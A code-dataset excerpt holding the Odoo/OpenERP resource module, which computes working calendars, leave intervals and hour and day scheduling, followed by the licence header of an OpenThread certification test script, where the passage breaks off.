| repo_name | path | copies | size | content | license |
|---|---|---|---|---|---|
bakhtout/odoo-educ | addons/resource/resource.py | 174 | 42653 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-TODAY OpenERP SA (http://www.openerp.com)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import datetime
from dateutil import rrule
from dateutil.relativedelta import relativedelta
from operator import itemgetter
from openerp import tools
from openerp.osv import fields, osv
from openerp.tools.float_utils import float_compare
from openerp.tools.translate import _
class resource_calendar(osv.osv):
""" Calendar model for a resource. It has
- attendance_ids: list of resource.calendar.attendance that are a working
interval in a given weekday.
- leave_ids: list of leaves linked to this calendar. A leave can be general
or linked to a specific resource, depending on its resource_id.
All methods in this class use intervals. An interval is a tuple holding
(begin_datetime, end_datetime). A list of intervals is therefore a list of
tuples, holding several intervals of work or leaves. """
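    # A minimal sketch (hypothetical values) of the interval representation used
    # throughout this class: a list of (begin_datetime, end_datetime) tuples, e.g.
    #   [(datetime.datetime(2014, 1, 1, 8, 0), datetime.datetime(2014, 1, 1, 12, 0)),
    #    (datetime.datetime(2014, 1, 1, 13, 0), datetime.datetime(2014, 1, 1, 17, 0))]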
_name = "resource.calendar"
_description = "Resource Calendar"
_columns = {
'name': fields.char("Name", required=True),
'company_id': fields.many2one('res.company', 'Company', required=False),
'attendance_ids': fields.one2many('resource.calendar.attendance', 'calendar_id', 'Working Time', copy=True),
'manager': fields.many2one('res.users', 'Workgroup Manager'),
'leave_ids': fields.one2many(
'resource.calendar.leaves', 'calendar_id', 'Leaves',
help=''
),
}
_defaults = {
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.calendar', context=context)
}
# --------------------------------------------------
# Utility methods
# --------------------------------------------------
def interval_clean(self, intervals):
""" Utility method that sorts and removes overlapping inside datetime
intervals. The intervals are sorted based on increasing starting datetime.
Overlapping intervals are merged into a single one.
:param list intervals: list of intervals; each interval is a tuple
(datetime_from, datetime_to)
:return list cleaned: list of sorted intervals without overlap """
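        # A worked sketch (hypothetical datetimes, with d(h) standing for
        # datetime.datetime(2014, 1, 1, h, 0)): overlapping intervals are merged,
        # disjoint ones are kept.
        #   interval_clean([(d(8), d(12)), (d(11), d(14)), (d(16), d(18))])
        #   -> [(d(8), d(14)), (d(16), d(18))]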
intervals = sorted(intervals, key=itemgetter(0)) # sort on first datetime
cleaned = []
working_interval = None
while intervals:
current_interval = intervals.pop(0)
if not working_interval: # init
working_interval = [current_interval[0], current_interval[1]]
elif working_interval[1] < current_interval[0]: # interval is disjoint
cleaned.append(tuple(working_interval))
working_interval = [current_interval[0], current_interval[1]]
elif working_interval[1] < current_interval[1]: # union of greater intervals
working_interval[1] = current_interval[1]
if working_interval: # handle void lists
cleaned.append(tuple(working_interval))
return cleaned
def interval_remove_leaves(self, interval, leave_intervals):
""" Utility method that remove leave intervals from a base interval:
- clean the leave intervals, to have an ordered list of not-overlapping
intervals
- initiate the current interval to be the base interval
- for each leave interval:
- finishing before the current interval: skip, go to next
- beginning after the current interval: skip and get out of the loop
because we are outside range (leaves are ordered)
- beginning within the current interval: close the current interval
and begin a new current interval that begins at the end of the leave
interval
- ending within the current interval: update the current interval begin
to match the leave interval ending
:param tuple interval: a tuple (beginning datetime, ending datetime) that
is the base interval from which the leave intervals
will be removed
:param list leave_intervals: a list of tuples (beginning datetime, ending datetime)
that are intervals to remove from the base interval
:return list intervals: a list of tuples (begin datetime, end datetime)
that are the remaining valid intervals """
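        # A worked sketch (hypothetical datetimes, with d(h) standing for
        # datetime.datetime(2014, 1, 1, h, 0)): a leave splits the base interval.
        #   interval_remove_leaves((d(8), d(18)), [(d(12), d(13))])
        #   -> [(d(8), d(12)), (d(13), d(18))]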
if not interval:
return interval
if leave_intervals is None:
leave_intervals = []
intervals = []
leave_intervals = self.interval_clean(leave_intervals)
current_interval = [interval[0], interval[1]]
for leave in leave_intervals:
if leave[1] <= current_interval[0]:
continue
if leave[0] >= current_interval[1]:
break
if current_interval[0] < leave[0] < current_interval[1]:
current_interval[1] = leave[0]
intervals.append((current_interval[0], current_interval[1]))
current_interval = [leave[1], interval[1]]
# if current_interval[0] <= leave[1] <= current_interval[1]:
if current_interval[0] <= leave[1]:
current_interval[0] = leave[1]
if current_interval and current_interval[0] < interval[1]: # remove intervals moved outside base interval due to leaves
intervals.append((current_interval[0], current_interval[1]))
return intervals
def interval_schedule_hours(self, intervals, hour, remove_at_end=True):
""" Schedule hours in intervals. The last matching interval is truncated
to match the specified hours.
        It is possible to truncate the last interval at its beginning or its end.
        However this does not reorder the given intervals, which should therefore
        be submitted in the appropriate order.
        :param list intervals: a list of tuples (beginning datetime, ending datetime)
        :param int/float hour: number of hours to schedule. It will be converted
                               into a timedelta, but should be submitted as an
                               int or float.
:param boolean remove_at_end: remove extra hours at the end of the last
matching interval. Otherwise, do it at the
beginning.
:return list results: a list of intervals. If the number of hours to schedule
is greater than the possible scheduling in the intervals, no extra-scheduling
is done, and results == intervals. """
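        # A worked sketch (hypothetical datetimes, with d(h) standing for
        # datetime.datetime(2014, 1, 1, h, 0)): scheduling 6 hours truncates the
        # last matching interval at its end.
        #   interval_schedule_hours([(d(8), d(12)), (d(13), d(17))], 6)
        #   -> [(d(8), d(12)), (d(13), d(15))]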
results = []
res = datetime.timedelta()
limit = datetime.timedelta(hours=hour)
for interval in intervals:
res += interval[1] - interval[0]
if res > limit and remove_at_end:
interval = (interval[0], interval[1] + relativedelta(seconds=seconds(limit-res)))
elif res > limit:
interval = (interval[0] + relativedelta(seconds=seconds(res-limit)), interval[1])
results.append(interval)
if res > limit:
break
return results
# --------------------------------------------------
# Date and hours computation
# --------------------------------------------------
def get_attendances_for_weekdays(self, cr, uid, id, weekdays, context=None):
""" Given a list of weekdays, return matching resource.calendar.attendance"""
calendar = self.browse(cr, uid, id, context=None)
return [att for att in calendar.attendance_ids if int(att.dayofweek) in weekdays]
def get_weekdays(self, cr, uid, id, default_weekdays=None, context=None):
""" Return the list of weekdays that contain at least one working interval.
If no id is given (no calendar), return default weekdays. """
if id is None:
return default_weekdays if default_weekdays is not None else [0, 1, 2, 3, 4]
calendar = self.browse(cr, uid, id, context=None)
weekdays = set()
for attendance in calendar.attendance_ids:
weekdays.add(int(attendance.dayofweek))
return list(weekdays)
def get_next_day(self, cr, uid, id, day_date, context=None):
""" Get following date of day_date, based on resource.calendar. If no
calendar is provided, just return the next day.
:param int id: id of a resource.calendar. If not given, simply add one day
to the submitted date.
:param date day_date: current day as a date
:return date: next day of calendar, or just next day """
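        # e.g. (illustrative) with working weekdays [0, 1, 2, 3, 4] (Mon-Fri),
        # calling get_next_day on a Friday returns the following Monday.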
if not id:
return day_date + relativedelta(days=1)
weekdays = self.get_weekdays(cr, uid, id, context)
base_index = -1
for weekday in weekdays:
if weekday > day_date.weekday():
break
base_index += 1
new_index = (base_index + 1) % len(weekdays)
days = (weekdays[new_index] - day_date.weekday())
if days < 0:
days = 7 + days
return day_date + relativedelta(days=days)
def get_previous_day(self, cr, uid, id, day_date, context=None):
""" Get previous date of day_date, based on resource.calendar. If no
calendar is provided, just return the previous day.
:param int id: id of a resource.calendar. If not given, simply remove
one day from the submitted date.
:param date day_date: current day as a date
:return date: previous day of calendar, or just previous day """
if not id:
return day_date + relativedelta(days=-1)
weekdays = self.get_weekdays(cr, uid, id, context)
weekdays.reverse()
base_index = -1
for weekday in weekdays:
if weekday < day_date.weekday():
break
base_index += 1
new_index = (base_index + 1) % len(weekdays)
days = (weekdays[new_index] - day_date.weekday())
if days > 0:
days = days - 7
return day_date + relativedelta(days=days)
def get_leave_intervals(self, cr, uid, id, resource_id=None,
start_datetime=None, end_datetime=None,
context=None):
"""Get the leaves of the calendar. Leaves can be filtered on the resource,
the start datetime or the end datetime.
:param int resource_id: the id of the resource to take into account when
computing the leaves. If not set, only general
leaves are computed. If set, generic and
specific leaves are computed.
:param datetime start_datetime: if provided, do not take into account leaves
ending before this date.
:param datetime end_datetime: if provided, do not take into account leaves
beginning after this date.
:return list leaves: list of tuples (start_datetime, end_datetime) of
leave intervals
"""
resource_calendar = self.browse(cr, uid, id, context=context)
leaves = []
for leave in resource_calendar.leave_ids:
if leave.resource_id and not resource_id == leave.resource_id.id:
continue
date_from = datetime.datetime.strptime(leave.date_from, tools.DEFAULT_SERVER_DATETIME_FORMAT)
if end_datetime and date_from > end_datetime:
continue
date_to = datetime.datetime.strptime(leave.date_to, tools.DEFAULT_SERVER_DATETIME_FORMAT)
if start_datetime and date_to < start_datetime:
continue
leaves.append((date_from, date_to))
return leaves
def get_working_intervals_of_day(self, cr, uid, id, start_dt=None, end_dt=None,
leaves=None, compute_leaves=False, resource_id=None,
default_interval=None, context=None):
""" Get the working intervals of the day based on calendar. This method
handle leaves that come directly from the leaves parameter or can be computed.
:param int id: resource.calendar id; take the first one if is a list
:param datetime start_dt: datetime object that is the beginning hours
for the working intervals computation; any
working interval beginning before start_dt
                                  will be truncated. If not set, defaults to end_dt
                                  (or to today() if end_dt is not set) at 00:00:00.
        :param datetime end_dt: datetime object that is the ending hour
                                for the working intervals computation; any
                                working interval ending after end_dt
                                will be truncated. If not set, defaults to start_dt
                                at 23:59:59.
:param list leaves: a list of tuples(start_datetime, end_datetime) that
represent leaves.
:param boolean compute_leaves: if set and if leaves is None, compute the
leaves based on calendar and resource.
If leaves is None and compute_leaves false
no leaves are taken into account.
:param int resource_id: the id of the resource to take into account when
computing the leaves. If not set, only general
leaves are computed. If set, generic and
specific leaves are computed.
:param tuple default_interval: if no id, try to return a default working
day using default_interval[0] as beginning
hour, and default_interval[1] as ending hour.
Example: default_interval = (8, 16).
Otherwise, a void list of working intervals
is returned when id is None.
:return list intervals: a list of tuples (start_datetime, end_datetime)
of work intervals """
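        # e.g. (illustrative) with id=None, default_interval=(8, 16) and a
        # start_dt of 10:00, the result is [(10:00, 16:00)]: the default working
        # day is truncated by the work limits derived from start_dt.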
if isinstance(id, (list, tuple)):
id = id[0]
# Computes start_dt, end_dt (with default values if not set) + off-interval work limits
work_limits = []
if start_dt is None and end_dt is not None:
start_dt = end_dt.replace(hour=0, minute=0, second=0)
elif start_dt is None:
start_dt = datetime.datetime.now().replace(hour=0, minute=0, second=0)
else:
work_limits.append((start_dt.replace(hour=0, minute=0, second=0), start_dt))
if end_dt is None:
end_dt = start_dt.replace(hour=23, minute=59, second=59)
else:
work_limits.append((end_dt, end_dt.replace(hour=23, minute=59, second=59)))
assert start_dt.date() == end_dt.date(), 'get_working_intervals_of_day is restricted to one day'
intervals = []
work_dt = start_dt.replace(hour=0, minute=0, second=0)
# no calendar: try to use the default_interval, then return directly
if id is None:
if default_interval:
working_interval = (start_dt.replace(hour=default_interval[0], minute=0, second=0), start_dt.replace(hour=default_interval[1], minute=0, second=0))
intervals = self.interval_remove_leaves(working_interval, work_limits)
return intervals
working_intervals = []
for calendar_working_day in self.get_attendances_for_weekdays(cr, uid, id, [start_dt.weekday()], context):
working_interval = (
work_dt.replace(hour=int(calendar_working_day.hour_from)),
work_dt.replace(hour=int(calendar_working_day.hour_to))
)
working_intervals += self.interval_remove_leaves(working_interval, work_limits)
# find leave intervals
if leaves is None and compute_leaves:
leaves = self.get_leave_intervals(cr, uid, id, resource_id=resource_id, context=None)
# filter according to leaves
for interval in working_intervals:
work_intervals = self.interval_remove_leaves(interval, leaves)
intervals += work_intervals
return intervals
def get_working_hours_of_date(self, cr, uid, id, start_dt=None, end_dt=None,
leaves=None, compute_leaves=False, resource_id=None,
default_interval=None, context=None):
""" Get the working hours of the day based on calendar. This method uses
get_working_intervals_of_day to have the work intervals of the day. It
then calculates the number of hours contained in those intervals. """
res = datetime.timedelta()
intervals = self.get_working_intervals_of_day(
cr, uid, id,
start_dt, end_dt, leaves,
compute_leaves, resource_id,
default_interval, context)
for interval in intervals:
res += interval[1] - interval[0]
return seconds(res) / 3600.0
def get_working_hours(self, cr, uid, id, start_dt, end_dt, compute_leaves=False,
resource_id=None, default_interval=None, context=None):
hours = 0.0
for day in rrule.rrule(rrule.DAILY, dtstart=start_dt,
until=(end_dt + datetime.timedelta(days=1)).replace(hour=0, minute=0, second=0),
byweekday=self.get_weekdays(cr, uid, id, context=context)):
day_start_dt = day.replace(hour=0, minute=0, second=0)
if start_dt and day.date() == start_dt.date():
day_start_dt = start_dt
day_end_dt = day.replace(hour=23, minute=59, second=59)
if end_dt and day.date() == end_dt.date():
day_end_dt = end_dt
hours += self.get_working_hours_of_date(
cr, uid, id, start_dt=day_start_dt, end_dt=day_end_dt,
compute_leaves=compute_leaves, resource_id=resource_id,
default_interval=default_interval,
context=context)
return hours
# --------------------------------------------------
# Hours scheduling
# --------------------------------------------------
def _schedule_hours(self, cr, uid, id, hours, day_dt=None,
compute_leaves=False, resource_id=None,
default_interval=None, context=None):
""" Schedule hours of work, using a calendar and an optional resource to
compute working and leave days. This method can be used backwards, i.e.
scheduling days before a deadline.
:param int hours: number of hours to schedule. Use a negative number to
compute a backwards scheduling.
:param datetime day_dt: reference date to compute working days. If days is
> 0 date is the starting date. If days is < 0
date is the ending date.
:param boolean compute_leaves: if set, compute the leaves based on calendar
and resource. Otherwise no leaves are taken
into account.
:param int resource_id: the id of the resource to take into account when
computing the leaves. If not set, only general
leaves are computed. If set, generic and
specific leaves are computed.
:param tuple default_interval: if no id, try to return a default working
day using default_interval[0] as beginning
hour, and default_interval[1] as ending hour.
Example: default_interval = (8, 16).
Otherwise, a void list of working intervals
is returned when id is None.
        :return tuple (datetime, intervals): datetime is the beginning/ending date
                                             of the scheduling; intervals are the
                                             working intervals of the scheduling.
        Note: rrule.rrule is not used because it does not seem to allow
        going back in time.
"""
if day_dt is None:
day_dt = datetime.datetime.now()
backwards = (hours < 0)
hours = abs(hours)
intervals = []
remaining_hours = hours * 1.0
iterations = 0
current_datetime = day_dt
call_args = dict(compute_leaves=compute_leaves, resource_id=resource_id, default_interval=default_interval, context=context)
while float_compare(remaining_hours, 0.0, precision_digits=2) in (1, 0) and iterations < 1000:
if backwards:
call_args['end_dt'] = current_datetime
else:
call_args['start_dt'] = current_datetime
working_intervals = self.get_working_intervals_of_day(cr, uid, id, **call_args)
if id is None and not working_intervals: # no calendar -> consider working 8 hours
remaining_hours -= 8.0
elif working_intervals:
if backwards:
working_intervals.reverse()
new_working_intervals = self.interval_schedule_hours(working_intervals, remaining_hours, not backwards)
if backwards:
new_working_intervals.reverse()
res = datetime.timedelta()
for interval in working_intervals:
res += interval[1] - interval[0]
remaining_hours -= (seconds(res) / 3600.0)
if backwards:
intervals = new_working_intervals + intervals
else:
intervals = intervals + new_working_intervals
# get next day
if backwards:
current_datetime = datetime.datetime.combine(self.get_previous_day(cr, uid, id, current_datetime, context), datetime.time(23, 59, 59))
else:
current_datetime = datetime.datetime.combine(self.get_next_day(cr, uid, id, current_datetime, context), datetime.time())
# avoid infinite loops
iterations += 1
return intervals
def schedule_hours_get_date(self, cr, uid, id, hours, day_dt=None,
compute_leaves=False, resource_id=None,
default_interval=None, context=None):
""" Wrapper on _schedule_hours: return the beginning/ending datetime of
an hours scheduling. """
res = self._schedule_hours(cr, uid, id, hours, day_dt, compute_leaves, resource_id, default_interval, context)
return res and res[0][0] or False
def schedule_hours(self, cr, uid, id, hours, day_dt=None,
compute_leaves=False, resource_id=None,
default_interval=None, context=None):
""" Wrapper on _schedule_hours: return the working intervals of an hours
scheduling. """
return self._schedule_hours(cr, uid, id, hours, day_dt, compute_leaves, resource_id, default_interval, context)
# --------------------------------------------------
# Days scheduling
# --------------------------------------------------
def _schedule_days(self, cr, uid, id, days, day_date=None, compute_leaves=False,
resource_id=None, default_interval=None, context=None):
"""Schedule days of work, using a calendar and an optional resource to
compute working and leave days. This method can be used backwards, i.e.
scheduling days before a deadline.
:param int days: number of days to schedule. Use a negative number to
compute a backwards scheduling.
:param date day_date: reference date to compute working days. If days is > 0
date is the starting date. If days is < 0 date is the
ending date.
:param boolean compute_leaves: if set, compute the leaves based on calendar
and resource. Otherwise no leaves are taken
into account.
:param int resource_id: the id of the resource to take into account when
computing the leaves. If not set, only general
leaves are computed. If set, generic and
specific leaves are computed.
:param tuple default_interval: if no id, try to return a default working
day using default_interval[0] as beginning
hour, and default_interval[1] as ending hour.
Example: default_interval = (8, 16).
Otherwise, a void list of working intervals
is returned when id is None.
        :return tuple (datetime, intervals): datetime is the beginning/ending date
                                             of the scheduling; intervals are the
                                             working intervals of the scheduling.
        Implementation note: rrule.rrule is not used because it does not seem
        to allow going back in time.
"""
if day_date is None:
day_date = datetime.datetime.now()
backwards = (days < 0)
days = abs(days)
intervals = []
planned_days = 0
iterations = 0
if backwards:
current_datetime = day_date.replace(hour=23, minute=59, second=59)
else:
current_datetime = day_date.replace(hour=0, minute=0, second=0)
while planned_days < days and iterations < 1000:
working_intervals = self.get_working_intervals_of_day(
cr, uid, id, current_datetime,
compute_leaves=compute_leaves, resource_id=resource_id,
default_interval=default_interval,
context=context)
if id is None or working_intervals: # no calendar -> no working hours, but day is considered as worked
planned_days += 1
intervals += working_intervals
# get next day
if backwards:
current_datetime = self.get_previous_day(cr, uid, id, current_datetime, context)
else:
current_datetime = self.get_next_day(cr, uid, id, current_datetime, context)
# avoid infinite loops
iterations += 1
return intervals
def schedule_days_get_date(self, cr, uid, id, days, day_date=None, compute_leaves=False,
resource_id=None, default_interval=None, context=None):
""" Wrapper on _schedule_days: return the beginning/ending datetime of
a days scheduling. """
res = self._schedule_days(cr, uid, id, days, day_date, compute_leaves, resource_id, default_interval, context)
return res and res[-1][1] or False
def schedule_days(self, cr, uid, id, days, day_date=None, compute_leaves=False,
resource_id=None, default_interval=None, context=None):
""" Wrapper on _schedule_days: return the working intervals of a days
scheduling. """
return self._schedule_days(cr, uid, id, days, day_date, compute_leaves, resource_id, default_interval, context)
# --------------------------------------------------
# Compatibility / to clean / to remove
# --------------------------------------------------
def working_hours_on_day(self, cr, uid, resource_calendar_id, day, context=None):
""" Used in hr_payroll/hr_payroll.py
        :deprecated: OpenERP saas-3. Use get_working_hours_of_date instead. Note:
        since saas-3, takes hour/minutes into account, not just the whole day."""
if isinstance(day, datetime.datetime):
day = day.replace(hour=0, minute=0)
return self.get_working_hours_of_date(cr, uid, resource_calendar_id.id, start_dt=day, context=None)
def interval_min_get(self, cr, uid, id, dt_from, hours, resource=False):
""" Schedule hours backwards. Used in mrp_operations/mrp_operations.py.
:deprecated: OpenERP saas-3. Use schedule_hours instead. Note: since
saas-3, counts leave hours instead of all-day leaves."""
return self.schedule_hours(
cr, uid, id, hours * -1.0,
day_dt=dt_from.replace(minute=0, second=0),
compute_leaves=True, resource_id=resource,
default_interval=(8, 16)
)
def interval_get_multi(self, cr, uid, date_and_hours_by_cal, resource=False, byday=True):
""" Used in mrp_operations/mrp_operations.py (default parameters) and in
interval_get()
        :deprecated: OpenERP saas-3. Use schedule_hours instead. Note:
        byday was not used. Since saas-3, counts leave hours instead of all-day leaves."""
res = {}
for dt_str, hours, calendar_id in date_and_hours_by_cal:
result = self.schedule_hours(
cr, uid, calendar_id, hours,
day_dt=datetime.datetime.strptime(dt_str, '%Y-%m-%d %H:%M:%S').replace(minute=0, second=0),
compute_leaves=True, resource_id=resource,
default_interval=(8, 16)
)
res[(dt_str, hours, calendar_id)] = result
return res
def interval_get(self, cr, uid, id, dt_from, hours, resource=False, byday=True):
""" Unifier of interval_get_multi. Used in: mrp_operations/mrp_operations.py,
crm/crm_lead.py (res given).
:deprecated: OpenERP saas-3. Use get_working_hours instead."""
res = self.interval_get_multi(
cr, uid, [(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)], resource, byday)[(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)]
return res
def interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource=False):
""" Unused wrapper.
:deprecated: OpenERP saas-3. Use get_working_hours instead."""
return self._interval_hours_get(cr, uid, id, dt_from, dt_to, resource_id=resource)
def _interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource_id=False, timezone_from_uid=None, exclude_leaves=True, context=None):
""" Computes working hours between two dates, taking always same hour/minuts.
:deprecated: OpenERP saas-3. Use get_working_hours instead. Note: since saas-3,
now resets hour/minuts. Now counts leave hours instead of all-day leaves."""
return self.get_working_hours(
cr, uid, id, dt_from, dt_to,
compute_leaves=(not exclude_leaves), resource_id=resource_id,
default_interval=(8, 16), context=context)
class resource_calendar_attendance(osv.osv):
_name = "resource.calendar.attendance"
_description = "Work Detail"
_columns = {
'name' : fields.char("Name", required=True),
'dayofweek': fields.selection([('0','Monday'),('1','Tuesday'),('2','Wednesday'),('3','Thursday'),('4','Friday'),('5','Saturday'),('6','Sunday')], 'Day of Week', required=True, select=True),
'date_from' : fields.date('Starting Date'),
'hour_from' : fields.float('Work from', required=True, help="Start and End time of working.", select=True),
'hour_to' : fields.float("Work to", required=True),
'calendar_id' : fields.many2one("resource.calendar", "Resource's Calendar", required=True),
}
_order = 'dayofweek, hour_from'
_defaults = {
'dayofweek' : '0'
}
def hours_time_string(hours):
""" convert a number of hours (float) into a string with format '%H:%M' """
minutes = int(round(hours * 60))
return "%02d:%02d" % divmod(minutes, 60)
class resource_resource(osv.osv):
_name = "resource.resource"
_description = "Resource Detail"
_columns = {
'name': fields.char("Name", required=True),
'code': fields.char('Code', size=16, copy=False),
'active' : fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the resource record without removing it."),
'company_id' : fields.many2one('res.company', 'Company'),
'resource_type': fields.selection([('user','Human'),('material','Material')], 'Resource Type', required=True),
'user_id' : fields.many2one('res.users', 'User', help='Related user name for the resource to manage its access.'),
        'time_efficiency' : fields.float('Efficiency Factor', size=8, required=True, help="This field depicts the efficiency of the resource in completing tasks, e.g. a resource put alone on a phase of 5 days with 5 tasks assigned to it will show a load of 100% for this phase by default; with an efficiency of 200%, its load will only be 50%."),
        'calendar_id' : fields.many2one("resource.calendar", "Working Time", help="Define the working schedule of the resource"),
}
_defaults = {
'resource_type' : 'user',
'time_efficiency' : 1,
'active' : True,
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.resource', context=context)
}
def copy(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
if not default.get('name', False):
default.update(name=_('%s (copy)') % (self.browse(cr, uid, id, context=context).name))
return super(resource_resource, self).copy(cr, uid, id, default, context)
def generate_resources(self, cr, uid, user_ids, calendar_id, context=None):
"""
        Return a dictionary of resource descriptions (name, vacation, efficiency) for the resources allocated to the phase.
NOTE: Used in project/project.py
"""
resource_objs = {}
user_pool = self.pool.get('res.users')
for user in user_pool.browse(cr, uid, user_ids, context=context):
resource_objs[user.id] = {
'name' : user.name,
'vacation': [],
'efficiency': 1.0,
}
resource_ids = self.search(cr, uid, [('user_id', '=', user.id)], context=context)
if resource_ids:
for resource in self.browse(cr, uid, resource_ids, context=context):
resource_objs[user.id]['efficiency'] = resource.time_efficiency
resource_cal = resource.calendar_id.id
if resource_cal:
leaves = self.compute_vacation(cr, uid, calendar_id, resource.id, resource_cal, context=context)
resource_objs[user.id]['vacation'] += list(leaves)
return resource_objs
def compute_vacation(self, cr, uid, calendar_id, resource_id=False, resource_calendar=False, context=None):
"""
Compute the vacation from the working calendar of the resource.
@param calendar_id : working calendar of the project
@param resource_id : resource working on phase/task
@param resource_calendar : working calendar of the resource
NOTE: used in project/project.py, and in generate_resources
"""
resource_calendar_leaves_pool = self.pool.get('resource.calendar.leaves')
leave_list = []
if resource_id:
leave_ids = resource_calendar_leaves_pool.search(cr, uid, ['|', ('calendar_id', '=', calendar_id),
('calendar_id', '=', resource_calendar),
('resource_id', '=', resource_id)
], context=context)
else:
leave_ids = resource_calendar_leaves_pool.search(cr, uid, [('calendar_id', '=', calendar_id),
('resource_id', '=', False)
], context=context)
leaves = resource_calendar_leaves_pool.read(cr, uid, leave_ids, ['date_from', 'date_to'], context=context)
        for leave in leaves:
            dt_start = datetime.datetime.strptime(leave['date_from'], '%Y-%m-%d %H:%M:%S')
            dt_end = datetime.datetime.strptime(leave['date_to'], '%Y-%m-%d %H:%M:%S')
            duration = dt_end - dt_start
            # append one date string per day covered by the leave (inclusive)
            for x in range(int(duration.days + 1)):
                leave_list.append((dt_start + datetime.timedelta(days=x)).strftime('%Y-%m-%d'))
leave_list.sort()
return leave_list
def compute_working_calendar(self, cr, uid, calendar_id=False, context=None):
"""
        Convert the working calendar from the 'OpenERP' format into the 'Faces' format.
@param calendar_id : working calendar of the project
NOTE: used in project/project.py
"""
if not calendar_id:
            # Calendar is not specified: default to Mon-Fri, 8:00-12:00 and 13:00-17:00
return [('fri', '8:0-12:0','13:0-17:0'), ('thu', '8:0-12:0','13:0-17:0'), ('wed', '8:0-12:0','13:0-17:0'),
('mon', '8:0-12:0','13:0-17:0'), ('tue', '8:0-12:0','13:0-17:0')]
resource_attendance_pool = self.pool.get('resource.calendar.attendance')
time_range = "8:00-8:00"
non_working = ""
week_days = {"0": "mon", "1": "tue", "2": "wed","3": "thu", "4": "fri", "5": "sat", "6": "sun"}
wk_days = {}
wk_time = {}
wktime_list = []
wktime_cal = []
week_ids = resource_attendance_pool.search(cr, uid, [('calendar_id', '=', calendar_id)], context=context)
weeks = resource_attendance_pool.read(cr, uid, week_ids, ['dayofweek', 'hour_from', 'hour_to'], context=context)
# Convert time formats into appropriate format required
# and create a list like [('mon', '8:00-12:00'), ('mon', '13:00-18:00')]
for week in weeks:
res_str = ""
day = None
if week_days.get(week['dayofweek'],False):
day = week_days[week['dayofweek']]
wk_days[week['dayofweek']] = week_days[week['dayofweek']]
else:
raise osv.except_osv(_('Configuration Error!'),_('Make sure the Working time has been configured with proper week days!'))
hour_from_str = hours_time_string(week['hour_from'])
hour_to_str = hours_time_string(week['hour_to'])
res_str = hour_from_str + '-' + hour_to_str
wktime_list.append((day, res_str))
# Convert into format like [('mon', '8:00-12:00', '13:00-18:00')]
for item in wktime_list:
if wk_time.has_key(item[0]):
wk_time[item[0]].append(item[1])
else:
wk_time[item[0]] = [item[0]]
wk_time[item[0]].append(item[1])
for k,v in wk_time.items():
wktime_cal.append(tuple(v))
# Add for the non-working days like: [('sat, sun', '8:00-8:00')]
for k, v in wk_days.items():
if week_days.has_key(k):
week_days.pop(k)
for v in week_days.itervalues():
non_working += v + ','
if non_working:
wktime_cal.append((non_working[:-1], time_range))
return wktime_cal
class resource_calendar_leaves(osv.osv):
_name = "resource.calendar.leaves"
_description = "Leave Detail"
_columns = {
'name' : fields.char("Name"),
'company_id' : fields.related('calendar_id','company_id',type='many2one',relation='res.company',string="Company", store=True, readonly=True),
'calendar_id' : fields.many2one("resource.calendar", "Working Time"),
'date_from' : fields.datetime('Start Date', required=True),
'date_to' : fields.datetime('End Date', required=True),
'resource_id' : fields.many2one("resource.resource", "Resource", help="If empty, this is a generic holiday for the company. If a resource is set, the holiday/leave is only for this resource"),
}
def check_dates(self, cr, uid, ids, context=None):
for leave in self.browse(cr, uid, ids, context=context):
if leave.date_from and leave.date_to and leave.date_from > leave.date_to:
return False
return True
_constraints = [
        (check_dates, 'Error! leave start-date must be lower than leave end-date.', ['date_from', 'date_to'])
]
def onchange_resource(self, cr, uid, ids, resource, context=None):
result = {}
if resource:
resource_pool = self.pool.get('resource.resource')
result['calendar_id'] = resource_pool.browse(cr, uid, resource, context=context).calendar_id.id
return {'value': result}
return {'value': {'calendar_id': []}}
def seconds(td):
assert isinstance(td, datetime.timedelta)
return (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) / 10.**6
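# Illustrative conversion: seconds(datetime.timedelta(hours=1, minutes=30)) -> 5400.0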
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
aeliot/openthread | tests/scripts/thread-cert/Cert_7_1_01_BorderRouterAsLeader.py | 4 | 4545 | #!/usr/bin/env python
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
